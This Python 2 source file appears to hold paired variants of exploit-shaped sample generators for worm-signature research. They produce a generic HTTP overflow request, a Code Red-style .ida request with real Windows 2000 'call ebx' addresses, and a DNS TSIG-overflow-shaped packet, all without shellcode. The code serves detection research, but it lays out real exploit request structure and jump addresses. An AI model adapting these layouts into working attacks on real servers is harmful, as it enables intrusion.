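    def generate(self, count):
        """Yield ``count`` synthetic overflow-shaped HTTP request lines.

        Each sample is ``'GET /'``, 701 filler bytes, a packed 32-bit value
        derived from ``self.ra``, ``self.after_ra_len`` more filler bytes,
        ``' HTTP/1.1'`` and CRLF.  The filler alphabet is every byte value
        except whitespace and NUL, so the only structure left for a
        signature generator to find is the fixed framing and the
        near-constant address.  These are test samples for signature
        experiments; they are exploit-shaped and should not be sent to
        hosts you do not own.

        Args:
            count: number of samples to yield.

        Yields:
            One request per iteration, as a Python 2 byte string.

        Instance attributes read (set elsewhere on the object):
            self.ra: base value embedded after the filler -- presumably the
                x86 return address of the overflow being imitated (TODO
                confirm).
            self.modulation: the embedded value is jittered uniformly in
                ``[ra - modulation, ra + modulation]`` for every sample.
            self.after_ra_len: number of filler bytes after the address.

        Raises:
            struct.error: if the jittered value falls outside ``[0, 2**32)``.
        """
        # Filler alphabet: every byte except the whitespace set
        # (' \t\n\r\x0b\x0c') and NUL, none of which survive an HTTP request
        # line or a C string copy intact.  Built once, not per sample.
        excluded = set(string.whitespace + chr(0))
        safe_chars = [chr(i) for i in xrange(256) if chr(i) not in excluded]

        for _ in xrange(count):
            # Jitter the address so it is not a byte-identical invariant
            # across samples.
            this_ra = self.ra + random.randint(-self.modulation,
                                               self.modulation)
            parts = [
                'GET /',
                random_bytes(701, safe_chars),
                # '<L' is always exactly 4 little-endian bytes.  The
                # original native 'L' is 8 bytes on LP64 hosts, which
                # would pad the address with four NUL bytes -- the very
                # byte the alphabet above goes out of its way to exclude.
                struct.pack('<L', this_ra),
                random_bytes(self.after_ra_len, safe_chars),
                ' HTTP/1.1',
                '\r\n',
            ]
            yield ''.join(parts)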
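    def generate(self, count):
        """Yield ``count`` synthetic overflow-shaped HTTP request lines.

        Layout of every sample: ``'GET /'``, 701 filler bytes, a packed
        32-bit value derived from ``self.ra``, ``self.after_ra_len`` more
        filler bytes, ``' HTTP/1.1'`` and CRLF.  Filler is drawn from every
        byte value except whitespace and NUL, leaving only the framing and
        the near-constant address as invariants.  These are test samples
        for signature experiments; they are exploit-shaped and should not
        be sent to hosts you do not own.

        Args:
            count: number of samples to yield.

        Yields:
            One request per iteration, as a Python 2 byte string.

        Instance attributes read (set elsewhere on the object):
            self.ra: base value embedded after the filler -- presumably the
                x86 return address of the overflow being imitated (TODO
                confirm).
            self.modulation: per-sample jitter; the embedded value is
                uniform in ``[ra - modulation, ra + modulation]``.
            self.after_ra_len: number of filler bytes after the address.

        Raises:
            struct.error: if the jittered value falls outside ``[0, 2**32)``.
        """
        # Every byte except whitespace (' \t\n\r\x0b\x0c') and NUL; these
        # would not survive an HTTP request line or a C string copy.
        # Computed once per call rather than per sample.
        blacklist = set(string.whitespace + chr(0))
        safe_chars = [chr(b) for b in xrange(256) if chr(b) not in blacklist]

        for _ in xrange(count):
            jitter = random.randint(-self.modulation, self.modulation)
            this_ra = self.ra + jitter
            # '<L' pins the address to 4 little-endian bytes.  Native 'L'
            # (the original) is 8 bytes on LP64 hosts and would insert four
            # NUL bytes, which the filler alphabet explicitly excludes.
            packed_ra = struct.pack('<L', this_ra)
            yield ''.join([
                'GET /',
                random_bytes(701, safe_chars),
                packed_ra,
                random_bytes(self.after_ra_len, safe_chars),
                ' HTTP/1.1',
                '\r\n',
            ])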
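    def generate(self, count):
        """Yield ``count`` synthetic Code Red-style ``.ida`` request lines.

        The layout follows the published Code Red / eEye ``.ida`` overflow
        request: a short random name, ``.ida?``, 222 letters, one of the
        ``NN``/``XX``/``CC`` markers, 15 letters, a ``%u``-encoded
        ``call ebx`` address from the table below, 15 more letters, ``=``,
        7 letters, ``' HTTP/1.0'`` and CRLF.  Only the marker and the
        address vary structurally; everything else is random letters of
        fixed length.  These are test samples for signature experiments
        and should not be sent to hosts you do not own.

        Args:
            count: number of samples to yield.

        Yields:
            One request line per iteration, as a Python 2 byte string.
            HTTP headers and the shellcode body are not generated yet (see
            the FIXME below).
        """
        # Addresses of a 'call ebx' in a Windows 2000 SP0/SP1 system DLL,
        # in the %u-encoded form the overflow expects; Code Red itself used
        # 0x7801cbd3.  Hoisted out of the loop: the list is constant.
        call_ebx_addrs = [
            '%u41f9%u7800',  # 0x780041f9
            '%u4223%u7800',  # 0x78004223
            '%ucb65%u7801',  # 0x7801cb65
            '%ucbd3%u7801',  # 0x7801cbd3 (used in actual codered)
            '%ucf3f%u7801',  # 0x7801cf3f
            '%ub23f%u7802',  # 0x7802b23f
        ]
        # 'NN' was used by Code Red, 'XX' by Code Red II, 'CC' by the eEye
        # example exploit.
        markers = ['NN', 'XX', 'CC']
        letters = string.letters

        # The byte-alphabet (safe_chars) and the samples list of the
        # original were dead code here: every field uses string.letters.
        for _ in xrange(count):
            parts = [
                'GET /',
                random_bytes(random.randrange(1, 10), letters),
                '.ida?',
                random_bytes(222, letters),
                random.choice(markers),
                # Purpose of this region is unclear; it appears to be
                # machine code in the real Code Red.
                random_bytes(15, letters),
                # The worm redirects control to this 'call ebx'.
                random.choice(call_ebx_addrs),
                random_bytes(15, letters),
                '=',
                random_bytes(7, letters),
                ' HTTP/1.0\r\n',
            ]
            # FIXME- still need headers and shellcode
            yield ''.join(parts)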
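    def generate(self, count):
        """Yield ``count`` synthetic Code Red-style ``.ida`` request lines.

        Each sample mirrors the published Code Red / eEye ``.ida`` overflow
        request: random name of 1-9 letters, ``.ida?``, 222 letters, a
        ``NN``/``XX``/``CC`` marker, 15 letters, a ``%u``-encoded
        ``call ebx`` address, 15 letters, ``=``, 7 letters, ``' HTTP/1.0'``
        and CRLF.  The marker and the address are the only structured
        choices; all other fields are fixed-length random letters.  These
        are test samples for signature experiments and should not be sent
        to hosts you do not own.

        Args:
            count: number of samples to yield.

        Yields:
            One request line per iteration, as a Python 2 byte string.
            Headers and shellcode are not generated yet (FIXME below).
        """
        # 'call ebx' locations in a Windows 2000 SP0/SP1 system DLL,
        # %u-encoded as the overflow expects.  Constant, so built once.
        call_ebx_addrs = [
            '%u41f9%u7800',  # 0x780041f9
            '%u4223%u7800',  # 0x78004223
            '%ucb65%u7801',  # 0x7801cb65
            '%ucbd3%u7801',  # 0x7801cbd3 (used in actual codered)
            '%ucf3f%u7801',  # 0x7801cf3f
            '%ub23f%u7802',  # 0x7802b23f
        ]
        # NN: Code Red; XX: Code Red II; CC: eEye example exploit.
        markers = ['NN', 'XX', 'CC']
        alphabet = string.letters

        # The original also built a 256-byte alphabet and an empty
        # 'samples' list that nothing read; both removed.
        for _ in xrange(count):
            name_len = random.randrange(1, 10)
            yield ''.join([
                'GET /',
                random_bytes(name_len, alphabet),
                '.ida?',
                random_bytes(222, alphabet),
                random.choice(markers),
                # Region of unclear purpose; looks like code in Code Red.
                random_bytes(15, alphabet),
                # Control is redirected to this 'call ebx'.
                random.choice(call_ebx_addrs),
                random_bytes(15, alphabet),
                '=',
                random_bytes(7, alphabet),
                ' HTTP/1.0\r\n',
            ])
            # FIXME- still need headers and shellcode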
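def special_random_bytes(count, safe):
    """Return ``count`` bytes mixing random filler with a running counter.

    Output is produced two bytes at a time.  With probability ``p`` (a
    module global) the pair is the module-global ``counter`` packed as a
    native 16-bit integer; otherwise it is two random bytes from ``safe``
    via ``worm_gen.random_bytes``.  ``counter`` advances once per pair
    whether or not it was emitted, so an emitted token reflects the
    position in the stream rather than the number of tokens emitted.

    Args:
        count: number of bytes to return.  Pairs are generated until at
            least ``count`` bytes exist, then the result is truncated.
        safe: alphabet passed through to ``worm_gen.random_bytes``.

    Returns:
        A Python 2 byte string of exactly ``count`` bytes (empty for
        ``count <= 0``).

    Side effects:
        Reads ``p`` and reads/increments ``counter``; both must be set at
        module level before the first call (``p`` is presumably a
        probability in ``[0, 1]`` -- TODO confirm).
    """
    import random
    import struct
    global counter
    global p

    buf = []
    while len(buf) < count:
        if random.random() < p:
            # Mask to 16 bits.  The original packed the raw counter, and
            # 'H' raises struct.error once it exceeds 0xffff -- i.e. after
            # 65536 pairs across all calls.  Below that the output is
            # unchanged.
            pair = struct.pack('H', counter & 0xffff)
        else:
            pair = worm_gen.random_bytes(2, safe)
        # Exactly two one-character strings per pair, as before.
        buf.append(pair[0])
        buf.append(pair[1])
        counter += 1
    return ''.join(buf[:count])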
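def special_random_bytes(count, safe):
    """Return ``count`` bytes interleaving random filler with a counter.

    Bytes are generated in pairs.  Each pair is, with probability ``p``
    (module global), the current module-global ``counter`` packed as a
    native 16-bit integer, and otherwise two random bytes drawn from
    ``safe`` by ``worm_gen.random_bytes``.  ``counter`` is incremented for
    every pair, emitted or not, so the value that shows up encodes the
    pair's position in the stream.

    Args:
        count: number of bytes to return; generation stops at the first
            pair that reaches it and the result is truncated to ``count``.
        safe: alphabet forwarded to ``worm_gen.random_bytes``.

    Returns:
        A Python 2 byte string of exactly ``count`` bytes.

    Side effects:
        Reads the module global ``p`` (presumably a probability in
        ``[0, 1]`` -- TODO confirm) and reads/increments ``counter``.
    """
    import random
    import struct
    global counter
    global p

    out = []
    while len(out) < count:
        use_counter = random.random() < p
        if use_counter:
            # Reduce to 16 bits: native 'H' raises struct.error for values
            # above 0xffff, which the original hit after 65536 pairs in
            # total.  Identical output for smaller counters.
            pair = struct.pack('H', counter & 0xffff)
        else:
            pair = worm_gen.random_bytes(2, safe)
        # Append exactly the first two characters, as the original did.
        out.append(pair[0])
        out.append(pair[1])
        counter += 1
    return ''.join(out[:count])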
def _rand_header():
    """Return one random ``Name: value`` HTTP header line ending in CRLF.

    The name is 3-9 and the value 10-19 characters long, both drawn from
    ``string.letters + string.digits`` by ``random_bytes``.
    """
    alphabet = string.letters + string.digits
    name = random_bytes(random.randrange(3, 10), alphabet)
    value = random_bytes(random.randrange(10, 20), alphabet)
    return name + ": " + value + "\r\n"
def _rand_header():
    """Return one random ``Name: value`` HTTP header line ending in CRLF.

    Name length is 3-9 and value length 10-19; both are alphanumeric
    (``string.letters + string.digits``) and come from
    ``worm_gen.random_bytes``.
    """
    alnum = string.letters + string.digits
    name_len = random.randrange(3, 10)
    name = worm_gen.random_bytes(name_len, alnum)
    value_len = random.randrange(10, 20)
    value = worm_gen.random_bytes(value_len, alnum)
    return "%s: %s\r\n" % (name, value)
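    def generate(self, count):
        """Yield ``count`` synthetic DNS-query-shaped exploit packets.

        Every sample is a DNS-like header followed by two "QNAME" regions
        and a record type/class.  Nearly every field is random bytes from
        the full 0-255 alphabet (NUL included).  The invariants are: the
        QR bit of the first flags byte is cleared (a query), the ARCOUNT
        is non-zero, the second QNAME carries a fixed ``0xff 0xbf`` pair
        at a fixed offset, both QNAME regions are NUL-terminated, and the
        record type is ``0x00fa`` (250, TSIG in the DNS type registry;
        which published exploit this imitates is not stated here).
        Inline comments give the published exploit's values where known.

        The packets are not well-formed DNS (QNAMEs are not label-encoded)
        -- they feed signature-generation experiments, not a resolver, and
        should not be sent to hosts you do not own.

        Args:
            count: number of samples to yield.

        Yields:
            One packet per iteration, as a Python 2 byte string.
        """
        # Full byte alphabet.  Built once instead of on every iteration,
        # and not called ``bytes`` so it no longer shadows the builtin.
        all_bytes = [chr(b) for b in xrange(256)]

        for _ in xrange(count):
            packet = []

            # ID (2 bytes): random.
            packet.append(random_bytes(2, all_bytes))

            # First flags byte: random with the top (QR) bit cleared so
            # the packet reads as a query.
            packet.append(chr(random.randrange(256) & ~0x80))

            # Remaining flag bits.  The exploit used a single byte ('\x80'
            # or '\x00', the RA bit); two random bytes are emitted here,
            # which makes this header 13 bytes, one more than a real DNS
            # header.  NOTE(review): kept as in the original -- confirm the
            # extra byte is intended and not an off-by-one.
            packet.append(random_bytes(2, all_bytes))

            # QDCOUNT: 2 in the published exploit; random here, though a
            # server would realistically only accept a small number.
            packet.append(random_bytes(2, all_bytes))
            # ANCOUNT: random.
            packet.append(random_bytes(2, all_bytes))
            # NSCOUNT: random.
            packet.append(random_bytes(2, all_bytes))
            # ARCOUNT: any non-zero value, native byte order as before.
            packet.append(struct.pack("H", random.randrange(1, 2 ** 16)))

            # First QNAME (256 bytes): holds the shellcode in the exploit.
            # Not label-encoded; random bytes suffice for signatures.
            packet.append(random_bytes(256, all_bytes))
            # No chr(0) terminator here: could equally be one long QNAME.

            # QTYPE/QCLASS (4 bytes): 00 01 00 01 in the exploit, but the
            # server does not check them, so random.
            packet.append(random_bytes(4, all_bytes))

            # Second QNAME, first 62 bytes: reused as the stack frame after
            # the overwrite.  (Some variants insert 06 00 00 00 here; they
            # are not emitted.)
            packet.append(random_bytes(62, all_bytes))

            # Stack address(es): the exploit had more, one may be enough.
            # Four random bytes, then the fixed high half -- looks like the
            # top of a 0xbfffxxxx 32-bit Linux stack address stored
            # little-endian (TODO confirm).
            packet.append(random_bytes(2, all_bytes))
            packet.append(random_bytes(2, all_bytes))
            packet.append("\xff\xbf")

            # Remainder of the second QNAME, NUL-terminated.
            packet.append(random_bytes(200, all_bytes))
            packet.append(chr(0))

            # QTYPE/QCLASS again: unchecked by the server, so random.
            packet.append(random_bytes(4, all_bytes))

            # A further NUL-terminated encoded field: zero-length in the
            # actual exploit, 10 random bytes here.
            packet.append(random_bytes(10, all_bytes))
            packet.append(chr(0))

            # Record type: the one fixed field, 0x00fa.
            packet.append(chr(0) + chr(0xFA))

            # Record class: should be 0x00ff, but the server does not check
            # it, so random.
            packet.append(random_bytes(2, all_bytes))

            yield "".join(packet)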
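    def generate(self, count):
        """Yield ``count`` synthetic DNS-query-shaped exploit packets.

        Each sample is a DNS-like header, two "QNAME" regions and a record
        type/class, almost entirely filled with random bytes from the full
        0-255 alphabet.  What stays fixed: the QR bit of the first flags
        byte is clear (a query), ARCOUNT is non-zero, a ``0xff 0xbf`` pair
        sits at a fixed offset in the second QNAME, both QNAME regions end
        in NUL, and the record type is ``0x00fa`` (250, TSIG in the DNS
        type registry; the page does not say which exploit is imitated).
        Comments note the published exploit's values where known.

        These packets are deliberately not well-formed DNS (no label
        encoding); they are inputs for signature-generation experiments and
        should not be sent to hosts you do not own.

        Args:
            count: number of samples to yield.

        Yields:
            One packet per iteration, as a Python 2 byte string.
        """
        # Full byte alphabet, hoisted out of the loop and renamed so it
        # does not shadow the ``bytes`` builtin.
        alphabet = [chr(b) for b in xrange(256)]
        rnd = lambda n: random_bytes(n, alphabet)

        for _ in xrange(count):
            # ID: random.
            fields = [rnd(2)]

            # First flags byte: random, QR bit (0x80) cleared -> a query.
            fields.append(chr(random.randrange(256) & ~0x80))

            # Remaining flag bits.  The exploit had one byte here ('\x80'
            # or '\x00', the RA bit); two random bytes are emitted, making
            # the header 13 bytes instead of 12.  NOTE(review): preserved
            # from the original -- confirm the extra byte is intended.
            fields.append(rnd(2))

            # QDCOUNT (2 in the exploit, random here), ANCOUNT, NSCOUNT.
            fields.append(rnd(2))
            fields.append(rnd(2))
            fields.append(rnd(2))
            # ARCOUNT: anything but zero, native byte order as before.
            fields.append(struct.pack('H', random.randrange(1, 2 ** 16)))

            # First QNAME (256 bytes): shellcode in the exploit.  Not
            # label-encoded; random is enough for signature purposes.  No
            # NUL terminator -- could be a single QNAME instead of two.
            fields.append(rnd(256))

            # QTYPE/QCLASS: 00 01 00 01 in the exploit, unchecked, random.
            fields.append(rnd(4))

            # Second QNAME, first 62 bytes: becomes the stack frame after
            # the overwrite.  Some variants insert 06 00 00 00 here (not
            # emitted).
            fields.append(rnd(62))

            # Stack address(es): more in the real exploit, maybe only one
            # needed.  Four random bytes then a fixed '\xff\xbf' -- looks
            # like the high half of a little-endian 0xbfffxxxx 32-bit
            # Linux stack address (TODO confirm).
            fields.append(rnd(2))
            fields.append(rnd(2))
            fields.append('\xff\xbf')

            # Rest of the second QNAME, NUL-terminated.
            fields.append(rnd(200))
            fields.append(chr(0))

            # QTYPE/QCLASS again: unchecked, random.
            fields.append(rnd(4))

            # Another NUL-terminated encoded field: zero-length in the
            # exploit, 10 random bytes here.
            fields.append(rnd(10))
            fields.append(chr(0))

            # Record type: the one fixed field, 0x00fa.
            fields.append(chr(0) + chr(0xfa))

            # Record class: should be 0x00ff, unchecked, random.
            fields.append(rnd(2))

            yield ''.join(fields)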
def _rand_header():
    """Return a random alphanumeric ``Name: value`` header line with CRLF.

    Name: 3-9 characters; value: 10-19 characters; both from
    ``string.letters + string.digits`` via ``random_bytes``.
    """
    chars = string.letters + string.digits
    header_name = random_bytes(random.randrange(3, 10), chars)
    header_value = random_bytes(random.randrange(10, 20), chars)
    return "".join([header_name, ": ", header_value, "\r\n"])
def _rand_header():
    """Return a random alphanumeric ``Name: value`` header line with CRLF.

    The name is 3-9 and the value 10-19 characters of
    ``string.letters + string.digits``, produced by
    ``worm_gen.random_bytes``.
    """
    chars = string.letters + string.digits
    name = worm_gen.random_bytes(random.randrange(3, 10), chars)
    value = worm_gen.random_bytes(random.randrange(10, 20), chars)
    return "".join([name, ": ", value, "\r\n"])